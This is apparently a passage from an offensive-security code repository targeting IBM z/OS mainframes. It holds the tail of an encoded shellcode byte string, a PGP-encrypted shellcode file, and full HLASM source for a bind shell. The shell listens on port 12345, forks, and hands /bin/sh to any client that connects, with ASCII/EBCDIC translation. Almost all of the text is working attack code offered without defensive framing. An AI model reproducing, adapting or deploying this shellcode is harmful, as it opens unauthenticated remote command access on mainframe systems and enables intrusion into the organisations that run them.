"\xee\x77\x2a\x2a\x2b\x86\x8d\x42\x2a\x2c\x8d\xcf\x2a\xb3\xea\x7a" 61 | "\x2a\x2a\x2b\x53\xea\xaa\x2a\x2a\x2a\x26\x8d\xcf\x2a\x31\x8d\xcf" 62 | "\x2a\xca\xea\x7a\x2a\x2a\x2b\x8b\x8d\xcf\x2a\x70\xea\x7a\x2a\x2a" 63 | "\x2b\xbc\xea\xaa\xd5\xd5\xd5\xc4\x8d\xcf\x2a\x26\x8d\xcf\x2a\xd4" 64 | "\xea\xca\xd5\xd5\xd5\xdc\xea\x7a\x2a\x2a\x2b\x77\x8d\xde\x2a\x62" 65 | "\xee\xd7\x2a\x2a\x2b\x68\x32\x94\x8d\xcf\xd4\x74\xea\x0a\x2a\x2a" 66 | "\x2b\x58\xfd\x29\x0a\x2a\x0a\x2a\xea\x0a\x2a\x2a\x2b\x4e\xfd\x25" 67 | "\x0a\x2a\x0a\x2a\xee\x75\xd5\xd5\xd4\x72\xea\x5a\x2a\x2a\x2b\x71" 68 | "\xee\x55\x2a\x2a\x2b\x7e\xea\x5a\x2a\x2a\x2b\x7b\xee\x55\xd5\xd5" 69 | "\xd4\x64\xea\x5a\x2a\x2a\x2b\x25\xee\x55\xd5\xd5\xd4\x60\xea\x5a" 70 | "\x2a\x2a\x2b\x6d\xee\x55\xd5\xd5\xd4\x6c\xea\x5a\x2a\x2a\x2b\x61" 71 | "\xee\x55\xd5\xd5\xd4\x68\x8d\x12\x2a\x2c\x8d\x72\x2a\x2d\x8d\xcf" 72 | "\xd4\x67\x32\xc1\x32\xd3\xee\x47\x2a\x2a\x2b\x17\xc6\x48\xca\x2a" 73 | "\x2a\xd4\xc6\x42\xaa\x2a\xd5\xd4\x8d\x2f\x2a\xf2\xee\xd7\x2a\x2a" 74 | "\x2a\xd4\x32\x94\x8d\xcf\xd4\x32\xee\x75\xd5\xd5\xd4\x34\xea\x5a" 75 | "\x2a\x2a\x2b\x0b\xee\x55\x2a\x2a\x2b\x30\xea\x5a\x2a\x2a\x2b\x3d" 76 | "\xee\x55\xd5\xd5\xd4\x3e\xea\x5a\x2a\x2a\x2a\xff\xee\x55\xd5\xd5" 77 | "\xd4\x3a\xea\x5a\x2a\x2a\x2b\x3d\xee\x55\xd5\xd5\xd4\x26\x8d\x12" 78 | "\x2a\x2f\x8d\x72\x2a\x2d\x8d\xcf\xd4\x33\x32\xc1\xee\x47\xd5\xd5" 79 | "\xd4\x2e\x32\xdc\xc6\x42\x2a\x80\xd5\x54\x2d\xd4\xee\xd7\x2a\x2a" 80 | "\x2a\xfa\x32\x94\x8d\xcf\xd7\xc2\xee\x75\x2a\x2a\x2a\xd4\xee\x05" 81 | "\x2a\x2a\x2a\xd7\xee\x45\x2a\x2a\x2a\xd6\xea\x5a\x2a\x2a\x2a\xdf" 82 | "\xee\x55\xd5\xd5\xd7\xc8\x30\x56\xee\x55\xd5\xd5\xd7\xca\x30\x56" 83 | "\xee\x55\xd5\xd5\xd7\xf4\x8d\x12\x2a\x2e\x8d\x72\x2a\x2c\x8d\xcf" 84 | "\xd7\xc7\x32\xc1\xee\x57\xd5\xd5\xd7\xfc\xc6\x52\x2a\x55\xd5\x54" 85 | "\x2d\xd4\xee\xd7\x2a\x2a\x2a\x8d\x32\x94\x8d\xcf\xd7\x97\xea\x5a" 86 | "\x2a\x2a\x2a\xf3\xee\x55\xd5\xd5\xd7\xea\x30\x56\xee\x55\xd5\xd5" 87 | 
"\xd7\x94\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd7\xe5\xee\x47" 88 | "\xd5\xd5\xd7\x9d\x8d\xd2\x2a\x49\xc6\x42\x2a\x4a\xd5\x54\xee\x77" 89 | "\x2a\x2a\x2a\xeb\xee\x47\x2a\x2a\x2a\xea\x32\xc1\x2d\xd4\xea\x3a" 90 | "\x2a\x2a\x2a\x83\xee\x67\x2a\x2a\x2a\x84\x8d\xa2\x2a\x3f\xea\x0a" 91 | "\x2a\x2a\x2a\xeb\x3d\x4c\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a" 92 | "\x2a\xd5\x33\x12\x8d\x5e\x2a\x22\x8d\x72\x2a\xaf\x68\x7a\x3a\x2a" 93 | "\x8d\xde\x2a\x25\xc9\x7a\x0a\x2a\x2a\x5c\xea\x71\x2a\x2a\x2a\xd5" 94 | "\x30\x43\x30\x03\x33\x1f\x8d\x5e\xd5\xdd\x68\x4a\x3a\x2a\x30\x33" 95 | "\x31\x63\x8d\x5e\xd5\xf4\x2d\xd4\xee\x67\x2a\x2a\x2a\xae\xea\x3a" 96 | "\x2a\x2a\x2a\x53\x8d\xa2\x2a\xaf\xea\x0a\x2a\x2a\x2a\xbe\x31\x03" 97 | "\xc9\x1a\x3a\x2a\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x33\x12\x8d\x5e" 98 | "\x2a\x2c\x8d\x12\x2a\x4f\x8d\xde\x2a\x23\x30\x09\xc9\x1a\x0a\x2a" 99 | "\x2a\x5c\xea\x11\x2a\x2a\x2a\xd5\x68\x1a\x3a\x2a\x30\x33\x31\x63" 100 | "\x8d\x5e\xd5\xce\x2d\xd4\x3d\xd5\xea\x6a\x2a\x2a\x2a\x3a\x7a\xda" 101 | "\x6a\x2a\x72\xfa\x6a\x2e\xb2\xc6\xfa\x26\xea\x6a\x2a\x2a\x2a\x2d" 102 | "\x72\xda\x6a\x2a\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 103 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2b\x79\x19\x96" 104 | "\x2b\x79\x19\x8e\x2b\x79\x1d\x3a\x2b\x79\x1c\x1c\x2b\x79\x1c\x42" 105 | "\x2b\x79\x1c\x0e\x2b\x79\x19\x34\x2b\x79\x19\xa0\x2b\x79\x18\x66" 106 | "\x2b\x79\x19\x2c\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a\x2a\x2a\x2a\x2a" 107 | "\x2a\x2a\x2a\x2a\x3a\x28\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 108 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2d\x4b\xa8\xa3\xbf\x4b\x88\xa2\x2a" 109 | "\x2a\x2a\x2a\x2b\x2a\x2a\x2a\x28\x2a\x2a\x2a\x2a\x88\xa2\x2a\x2a" 110 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x3a" 111 | "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08" 112 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 113 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 114 | 
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x28\x28\x1a\x13\x2a\x2a\x2a\x2a" 115 | "\x01\x02\x03\x9c\x09\x86\x7f\x97\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10" 116 | "\x11\x12\x13\x9d\x0a\x08\x87\x18\x19\x92\x8f\x1c\x1d\x1e\x1f\x80" 117 | "\x81\x82\x83\x84\x85\x17\x1b\x88\x89\x8a\x8b\x8c\x05\x06\x07\x90" 118 | "\x91\x16\x93\x94\x95\x96\x04\x98\x99\x9a\x9b\x14\xff\x9e\x1a\x20" 119 | "\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26" 120 | "\xe9\xea\xeb\xe8\xed\xee\xef\xec\xdf\x21\x24\x2a\x29\x3b\x5e\x2d" 121 | "\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8" 122 | "\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc\x60\x3a\x23\x40\x27\x3d\x22\xd8" 123 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0" 124 | "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5" 125 | "\x7e\x73\x74\x75\x76\x77\x78\x79\x7a\xa1\xbf\xd0\x5b\xde\xae\xac" 126 | "\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b" 127 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d" 128 | "\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c" 129 | "\xf7\x53\x54\x55\x56\x57\x58\x59\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30" 130 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\xb3\xdb\xdc\xd9\xda\x9f"; 131 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.txt.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | 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 40 | 6+PiPBdv9qj4T67/oxaLESlveJQRAxC2bwrXi2oJ3AqSTNnRCQ5nAMNHTGpacg1Z 41 | cYT2LLUhTZ8woRlwpsIbQVSFJCM22ymh/ojZJw01CI2XJ4gCOWdCh6E5+DJuQbIJ 42 | FeCq4oQTXGRUGkOdrySIMqYCHXoiCBLKjJodtq9YltRmKBV1MhEBo1NhujoEgd1n 43 | 6hW21IFgSXAMgSApZmuE469HPgPPHK5xH8AEBsVQ5kChAXWNBokE3LL1ZCW1aM25 44 | S47P9IgSyozRgkYMUQvqGyGMQ5m0ytkRIDzpKMxHgNAV/VGEOLJWFG/WDXlyBEVo 45 | sSGVMw5Aw6ZwOZL7afC5BIE6f57QuYpMMcfZkdM5mnPtGz0jpaiehRQXRSm0qlXU 46 | HwKoiCALRIaY4xjmHhmCAcnJlmm3aGhV0OFQoc9MwQHSWjT0kI8jXEddB+m9LMgh 47 | 4shBXwTuBi04tBpMcxgXde/gjSpNqiT6HdSOVjkVJBT3kBFfGM+lYTJ8SylClFTv 48 | TGMKChGmoN6NLCDNKepDMonAETUdxBxdTlkiQly0rrmUjsgF/hAhGlotqArgZM/A 49 | dExxN3pInaJYHNVIHJKwUm5DonaJ0AThKAJjBMkI41GQyErKQXC+4pBEXtJwKmxi 50 | jagPlBCWmgMfJzp+odIouRpbUgWpUZR4NSWdwWW34y0LKxtfs2nDxoUNF778ghvP 51 | 7FzdsHDxpTcdO3voiov2bvvQnZv/dcf+F5bVI/tX1Q+P3/77f976hbsuuXjz4qGF 52 | a/9y5Z8efuWH7z/560f/8dbDD57Y+unFN5VPHjy++Nldf/juizff9fAFD77rN9me 53 | dyyKLYvvfm51d1UdPrDyu6P3HPzioWeKex87ff1TP/7qqe8dXPnFIyee3bRwXfbM 54 | m7dd+ES1d2n73bd85/IbDjebX3/2VX9buuMjnzt52VVPHbm/XP3Y0+JLb39D+8Zd 55 | 9724ZWvz16c/tXrqygOvuHsledv2xYPvv+baW159pPryrucX9733hfft3vKzbz5w 56 | 9fXHzv3o6OV/PnLmsV+e235de+L5T55+4J6TBx56z09/9f2ffP3E58++c+VIe9VX 57 | Dv/21g8++e1v3Pns8n2bPvDRq791/PTfzz332nt/sPvUzx96fOtl/wY= 58 | =exjH 59 | -----END PGP MESSAGE----- 60 | -------------------------------------------------------------------------------- /bind-shell/shell_bind.s: -------------------------------------------------------------------------------- 1 | TITLE 'bind shell for mainframe/system Z' 2 | BINDSH CSECT 3 | BINDSH AMODE 31 4 | BINDSH RMODE ANY 5 | *********************************************************************** 6 | * * 7 | * @SETUP registers and save areas * 8 | * * 9 | *********************************************************************** 10 | @SETUP DS 0F # full word boundary 11 | STM 14,12,12(13) # save our registers 12 | LARL 15,@SETUP # base address into R15 13 | LR 
8,15 # copy R15 to R8 14 | USING @SETUP,8 # R8 for addressability throughout 15 | LARL 11,SAVEAREA # sa address 16 | ST 13,4(,11) # save callers save area 17 | LR 13,11 # R13 to our save area 18 | DS 0H # halfword boundaries 19 | 20 | *********************************************************************** 21 | * * 22 | * @LOADFS - load all the functions we need * 23 | * for SC loop this * 24 | * * 25 | *********************************************************************** 26 | @LOADFS L 2,FFUNC # first function we use 27 | LHI 3,8 # used for our index 28 | L 4,NUMFUNC # number of functions to load 29 | @LDLOOP LR 0,2 # load string of func name 30 | XR 1,1 # clear R1 31 | SVC 8 # perform LOAD 32 | XC 0(8,2),0(2) # clear current Func space 33 | ST 0,0(0,2) # store addr in func space 34 | AR 2,3 # increment R2 by 8 35 | AHI 4,-1 # decrement R4 36 | CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop 37 | 38 | *********************************************************************** 39 | * * 40 | * BPX1SOC set up socket - inline * 41 | * * 42 | *********************************************************************** 43 | LSOCK L 15,BSOC # load func addr to 15 44 | CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x 45 | RTN_VAL,RTN_COD,RSN_COD),VL 46 | ******************************* 47 | * chk return code, 0 or exit * 48 | ******************************* 49 | LHI 15,2 50 | L 6,RTN_VAL 51 | CIB 6,0,7,EXITP # R6 not 0? 
Time to exit 52 | 53 | *********************************************************************** 54 | * * 55 | * BPC1BND (bind) bind to socket - inline * 56 | * * 57 | *********************************************************************** 58 | LBIND L 15,BBND # load func addr to 15 59 | LA 5,SRVSKT # addr of our socket 60 | USING SOCKADDR,5 # layout sockaddr over R5 61 | XC SOCKADDR(16),SOCKADDR # zero sock addr struct 62 | MVI SOCK_FAMILY,AF_INET # family inet 63 | MVI SOCK_LEN,SOCK#LEN # len of socket 64 | MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345 65 | MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0 66 | DROP 5 67 | CALL (15),(SRVFD,SOCKLEN,SRVSKT, x 68 | RTN_VAL,RTN_COD,RSN_COD),VL 69 | ******************************* 70 | * chk return code, 0 or exit * 71 | ******************************* 72 | LHI 15,3 73 | L 6,RTN_VAL 74 | CIB 6,0,7,EXITP # R6 not 0? Time to exit 75 | 76 | *********************************************************************** 77 | * * 78 | * BPX1LSN (listen) listen on created socket - inline * 79 | * * 80 | *********************************************************************** 81 | LLIST L 15,BLSN # load func addr to 15 82 | CALL (15),(SRVFD,BACKLOG, x 83 | RTN_VAL,RTN_COD,RSN_COD),VL 84 | ******************************* 85 | * chk return code, 0 or exit * 86 | ******************************* 87 | LHI 15,4 88 | L 6,RTN_VAL 89 | CIB 6,0,7,EXITP # R6 not 0? 
Time to exit 90 | 91 | *********************************************************************** 92 | * * 93 | * BPX1ACP (accept) - accept conn from socket - inline * 94 | * * 95 | *********************************************************************** 96 | LACPT L 15,BACP # load func addr to 15 97 | LA 5,CLISKT # addr of our socket address 98 | USING SOCKADDR,5 # set up addressing for sock struct 99 | XC SOCKADDR(8),SOCKADDR #zero sock addr struct 100 | MVI SOCK_FAMILY,AF_INET 101 | MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN) 102 | DROP 5 103 | CALL (15),(SRVFD,CLILEN,CLISKT, x 104 | CLIFD,RTN_COD,RSN_COD),VL 105 | **************************************************** 106 | * chk return code here anything but -1 is ok * 107 | **************************************************** 108 | LHI 15,5 109 | L 6,CLIFD 110 | CIB 6,-1,8,EXITP # R6 = -1? Time to exit 111 | 112 | *********************************************************************** 113 | * * 114 | * Create pipes to be used to communicate with child proc * 115 | * that will be created in upcoming forking * 116 | * * 117 | *********************************************************************** 118 | @CPIPES BRAS 14,LPIPE # get FDs for child proc 119 | @CFD ST 5,CFDR # store child read fd 120 | ST 6,CFDW # store child write fd 121 | @CPIPE2 BRAS 14,LPIPE 122 | @PFD ST 5,PFDR # store parent read fd 123 | ST 6,PFDW # store parent write fd 124 | 125 | *********************************************************************** 126 | * * 127 | * BP1FRK (FORK) fork a child process * 128 | * * 129 | *********************************************************************** 130 | LFORK L 15,BFRK # load func addr to 15 131 | CALL (15),(CPROCN,RTN_COD,RSN_COD),VL 132 | BRAS 0,@PREPCHL 133 | **************************************************** 134 | * chk return code here anything but -1 is ok * 135 | **************************************************** 136 | LHI 15,1 # load 1 for RC / Debugging 137 | L 6,CPROCN # locad Ret val in R6 138 | 
         CIB   6,-1,8,EXITP        # compare R6 to -1 and jump if eq

****************************************************
* prepare the child process for exec, only runs *
* if CPROCN (child pid from fork) equals 0 *
****************************************************
@PREPCHL L     2,CPROCN            # load child proc # to R2
         CIB   2,0,7,@PREPPAR      # R2 not 0? We are parent, move on

*************************************************
* order of things to prep child pid *
* 0) Close parent write fd *
* 1) Close child read fd *
* 2) dupe parent read fd to std input *
* 3) dupe child write fd to std output *
* 4) dupe child write fd to std err *
* 5) Close parent read fd *
* 6) Close child write fd *
* 7) exec /bin/sh *
*************************************************
         LA    2,F_CLOSFD
         L     5,PFDW              # load R5 with pfdw
         L     6,PFDW              # load R6 with pfdw
@PRC0    BRAS  14,LFCNTL           # call close
         LA    2,F_CLOSFD
         L     5,CFDR              # load R5 with cfdr
         L     6,CFDR              # load R6 with cfdr
         BRAS  14,LFCNTL           # call close
         LA    2,F_DUPFD2          # gonna do a dup2
         L     5,PFDR              # parent read fd
         LGFI  6,0                 # std input
         BRAS  14,LFCNTL           # call dupe2
         LA    2,F_DUPFD2          # gonna do a dup2
         L     5,CFDW              # child write fd
         LGFI  6,1                 # std output
         BRAS  14,LFCNTL           # call dupe2
         LA    2,F_DUPFD2          # gonna do a dup2
         L     5,CFDW              # child write fd
         LGFI  6,2                 # std error
         BRAS  14,LFCNTL           # call dupe2
         LA    2,F_CLOSFD
         L     5,PFDR              # load R5 with pfdr
         L     6,PFDR              # load R6 with pfdr
         BRAS  14,LFCNTL           # call close
         LA    2,F_CLOSFD
         L     5,CFDW              # load R5 with cfdw
         L     6,CFDW              # load R6 with cfdw
         BRAS  14,LFCNTL           # call close

***********************************************************************
* *
* BPX1EXC (EXEC) execute shell '/bin/sh' *
* *
***********************************************************************
LEXEC    L     15,BEXC             # load func addr to 15
         CALL  (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,               x
               EXENVC,EXENVLL,EXENVL,                                  x
               EXITRA,EXITPLA,                                         x
               RTN_VAL,RTN_COD,RSN_COD),VL
         BRAS  0,GOODEX            # exit child proc after exec

****************************************************
* prepare the parent process to speak with child *
* order of things to prep parent pid *
* 0) close parent fd read *
* 1) close child fd write *
* 2) socket,bind,accept,listen,read & write *
* 3) set client socket and child fd write *
* to non_blocking *
****************************************************
@PREPPAR LA    2,F_CLOSFD
         L     5,PFDR              # load R5 with pfdr
         L     6,PFDR              # load R6 with pfdr
         BRAS  14,LFCNTL           # call close
         LA    2,F_CLOSFD
         L     5,CFDW              # load R5 with cfdw
         L     6,CFDW              # load R6 with cfdw
         BRAS  14,LFCNTL           # call close

****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
         LA    2,F_GETFL           # get file status flags
         L     5,CLIFD             # client sock fd
         XR    6,6                 # for getfl, arg is 0
         BRAS  14,LFCNTL           # call fcntl
         LA    5,O_NONBLOCK        # add non-blocking flag
         OR    7,5                 # or to add the flag to R7
         LA    2,F_SETFL           # set file status flags
         L     5,CLIFD             # client sock fd
         LR    6,7                 # put new flags in R6
         BRAS  14,LFCNTL           # call fcntl
         LA    2,F_GETFL           # get file status flags
         L     5,CFDR              # child fd read
         XR    6,6                 # for getfl, arg is 0
         BRAS  14,LFCNTL           # call fcntl
         LA    5,O_NONBLOCK        # add non-blocking flag
         OR    7,5                 # or to add the flag to R7
         LA    2,F_SETFL           # set file status flags
         L     5,CFDR              # child fd read
         LR    6,7                 # put new flags in R6
         BRAS  14,LFCNTL           # call fcntl
***********************************************************************
* *
* Main read from client socket loop starts here *
* *
***********************************************************************
@READCLI L     5,CLIFD             # read from CLIFD
         LA    7,@READCFD          # Nothing read, return to here
         BRAS  14,LREAD            # Branch to read function

*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
         BRAS  14,CONVAE           # call a2e func
         L     5,PFDW              # write to child process fd
         BRAS  14,LWRITE           # call write function

***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L     5,CFDR              # read from child fd
         LA    7,@READCLI          # nothing read, back to socket read
         BRAS  14,LREAD            # Branch to read function

*******************************
* CALL E2A *
* change CLIBUF from *
* ebcdic to ASCII *
*******************************
         BRAS  14,CONVEA           # call e2a func
         L     5,CLIFD             # write to client socket fd
         BRAS  14,LWRITE           # call write function

********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD    L     15,BRED             # load func addr to 15
         ST    5,@TRFD             # file descriptor we are reading
         ST    7,@NRA              # no bytes read: return address
         ST    14,SAVEAREA         # bytes read: return address
         XR    1,1                 # clear R1
         ST    1,BREAD             # clear Bytes Read
         L     5,CLIBUF            # clibuf addr
         XC    0(52,5),0(5)        # 0 out cli buf
         BRAS  0,@CRED             # jump to call
         DS    0F
@TRFD    DC    4XL1'0'             # temp var for rd to read
@NRA     DC    4XL1'0'             # temp var for not read ret addr
@CRED    CALL  (15),(@TRFD,CLIBUF,ALET,CLIREAD,                        x
               BREAD,RTN_COD,RSN_COD),VL
         DS    0H
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
         L     14,SAVEAREA         # bytes read RA
         L     7,@NRA              # no bytes read RA
         LHI   15,6                # exit code for this function
         L     6,BREAD             # bytes read (aka rtn val)
         CIB   6,0,2,0(14)         # bytes read, process them
         CIB   6,0,8,0(7)          # OK rtn code, on to nobyte read
         L     6,RTN_COD           # load up return code
         LA    1,EWOULDBLOCK       # load up the non-blocking RTNCOD
         LA    2,EAGAIN            # load up the other OK nblck RTNCOD
         CRB   6,1,8,0(7)          # OK rtn code, on to nobyte read
         CRB   6,2,8,0(7)          # OK rtn code, on to nobyte read
         BRAS  0,EXITP             # -1 and not due to blocking, exit

***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to write to *
* *
***********************************************************************
LWRITE   L     15,BWRT             # load func addr to 15
         ST    5,@TWFD             # store fd in temp fd
         ST    14,SAVEAREA         # save return address
         BRAS  0,@CWRT             # jump to write
@TWFD    DC    A(*)                # temp holder for fd
@CWRT    CALL  (15),(@TWFD,CLIBUF,ALET,BREAD,                          x
               BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
         L     14,SAVEAREA         # restore return address
         LHI   15,9                # exit code for this func
         L     6,BWRIT             # set r6 to rtn val
         CIB   6,-1,8,EXITP        # exit if R6 = -1
         BCR   15,14               # back to return address

***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6= R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL   L     15,BFCT             # load func addr to 15
         ST    14,SAVEAREA         # save return address
         ST    5,@FFD              # fd to be duplicated
         ST    2,@ACT              # action field for BPX1FCT
         ST    6,@ARG              # r6 should have the biggest fd
         BRAS  0,@FCTL
@FFD     DC    F'0'
@ACT     DC    F'0'
@ARG     DC    F'0'
@RETFD   DC    F'0'
@FCTL    CALL  (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
         LHI   15,11               # exit code for this func
         L     7,@RETFD            # set r7 to rtn val
         CIB   7,-1,8,EXITP        # r7 = -1 exit
         L     14,SAVEAREA         # reload ret address
         BCR   15,14               # return to caller

***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE    L     15,BPIP             # load func addr to 15
         ST    14,SAVEAREA         # save return address
         BRAS  0,@PIP
@RFD     DC    F'0'                # read file desc
@WFD     DC    F'0'                # write file desc
@PIP     CALL  (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
         LHI   15,12               # exit code for this func
         L     6,BWRIT             # set r6 to rtn val
         CIB   6,-1,8,EXITP
         L     5,@RFD              # load R5 with read fd
         L     6,@WFD              # load R6 with write fd
         L     14,SAVEAREA         # reload ret address
         BCR   15,14               # return to caller

